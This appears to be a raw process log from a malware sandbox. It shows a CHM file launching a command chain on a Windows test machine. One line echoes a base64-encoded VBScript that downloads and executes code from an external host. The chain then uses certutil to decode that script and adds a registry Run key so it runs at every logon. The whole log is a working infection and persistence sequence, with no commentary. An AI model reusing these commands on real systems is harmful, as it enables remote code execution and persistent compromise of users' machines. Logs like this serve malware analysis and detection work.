cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vjZHYuYwki" C:\Users\test22\AppData\Local\Temp\364D4FDF430477222FE854B3CD5B6D40.chm
2576hh.exe "C:\Windows\hh.exe" C:\Users\test22\AppData\Local\Temp\364D4FDF430477222FE854B3CD5B6D40.chm
2688cmd.exe "C:\Windows\System32\cmd.exe" /c echo T24gRXJyb3IgUmVzdW1lIE5leHQNCg0KU2V0IG14ID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQpteC5vcGVuICJHRVQiLCAiaHR0cDovLzAwNzAxMTExLjAwMHdlYmhvc3RhcHAuY29tL3dwLWV4dHJhL3Nob3cucGhwP3F1ZXJ5PTUwIiwgRmFsc2UNCm14LlNlbmQNCg0KRXhlY3V0ZShteC5yZXNwb25zZVRleHQp >"%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat" "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs" /f
2972certutil.exe certutil -decode "C:\Users\test22\Links\MXFhejJ3c3gzZWRjA.dat" "C:\Users\test22\Links\MXFhejJ3c3gzZWRjA.vbs"
3036reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "C:\Users\test22\Links\MXFhejJ3c3gzZWRjA.vbs" /f
1404